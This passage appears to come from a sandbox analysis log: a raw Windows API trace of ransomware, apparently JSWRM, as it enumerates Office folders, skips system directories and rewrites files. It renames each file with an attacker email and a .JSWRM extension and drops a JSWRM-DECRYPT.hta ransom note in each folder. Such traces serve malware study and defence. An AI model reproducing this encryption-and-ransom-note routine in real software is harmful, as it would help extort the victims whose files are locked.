cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ar\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ar\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.211] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19608) returned 1 [0136.211] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.211] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4c90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4c90, lpOverlapped=0x0) returned 1 [0136.214] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.214] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4c90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4c90, lpOverlapped=0x0) returned 1 [0136.214] CloseHandle (hObject=0x314) returned 1 [0136.214] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ar\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ar\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ar\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ar\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.215] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9992797, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4c98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.215] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0136.215] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bg", cAlternateFileName="")) returned 1 [0136.215] lstrcmpiW (lpString1="bg", lpString2=".") returned 1 [0136.215] lstrcmpiW (lpString1="bg", lpString2="..") returned 1 [0136.215] lstrcmpiW (lpString1="bg", lpString2="...") returned 1 [0136.215] lstrcmpiW (lpString1="bg", lpString2="windows") returned -1 [0136.215] lstrcmpiW (lpString1="bg", lpString2="recovery") returned -1 [0136.215] lstrcmpiW (lpString1="bg", lpString2="perflogs") returned -1 [0136.215] lstrcmpiW (lpString1="bg", lpString2="documents and settings") returned -1 [0136.215] lstrcmpiW (lpString1="bg", lpString2="$RECYCLE.BIN") returned 1 [0136.215] lstrcmpiW (lpString1="bg", lpString2="system volume information") returned -1 [0136.215] lstrcmpiW (lpString1="bg", lpString2="msocache") returned -1 [0136.216] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\bg\\jswrm-decrypt.hta")) returned 0xffffffff [0136.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\bg\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.218] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.218] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.219] CloseHandle (hObject=0x238) returned 1 [0136.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\bg\\jswrm-decrypt.hta")) returned 0x20 [0136.219] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\bg\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47da03a3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0136.219] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.219] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47da03a3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.220] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.220] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.220] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47da03a3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47da03a3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47da03a3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.220] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.220] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.220] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\bg\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\bg\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.221] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22168) returned 1 [0136.221] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.222] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5690, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5690, lpOverlapped=0x0) returned 1 [0136.224] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.224] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5690, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5690, lpOverlapped=0x0) returned 1 [0136.225] CloseHandle (hObject=0x314) returned 1 [0136.225] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\bg\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\bg\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\bg\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\bg\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.226] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.226] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0136.226] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ca", cAlternateFileName="")) returned 1 [0136.226] lstrcmpiW (lpString1="ca", lpString2=".") returned 1 [0136.226] lstrcmpiW (lpString1="ca", lpString2="..") returned 1 [0136.226] lstrcmpiW (lpString1="ca", lpString2="...") returned 1 [0136.226] lstrcmpiW (lpString1="ca", lpString2="windows") returned -1 [0136.226] lstrcmpiW (lpString1="ca", lpString2="recovery") returned -1 [0136.226] lstrcmpiW (lpString1="ca", lpString2="perflogs") returned -1 [0136.226] lstrcmpiW (lpString1="ca", lpString2="documents and settings") returned -1 [0136.226] lstrcmpiW (lpString1="ca", lpString2="$RECYCLE.BIN") returned 1 [0136.226] lstrcmpiW (lpString1="ca", lpString2="system volume information") returned -1 [0136.226] lstrcmpiW (lpString1="ca", lpString2="msocache") returned -1 [0136.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ca\\jswrm-decrypt.hta")) returned 0xffffffff [0136.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ca\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.227] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.227] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.228] CloseHandle (hObject=0x238) returned 1 [0136.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ca\\jswrm-decrypt.hta")) returned 0x20 [0136.229] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ca\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47dc50b4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0136.229] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.229] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47dc50b4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.229] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.229] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.229] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47dc50b4, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47dc50b4, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47dc50b4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.229] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.229] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.230] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ca\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ca\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.232] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22680) returned 1 [0136.232] SetFilePointer 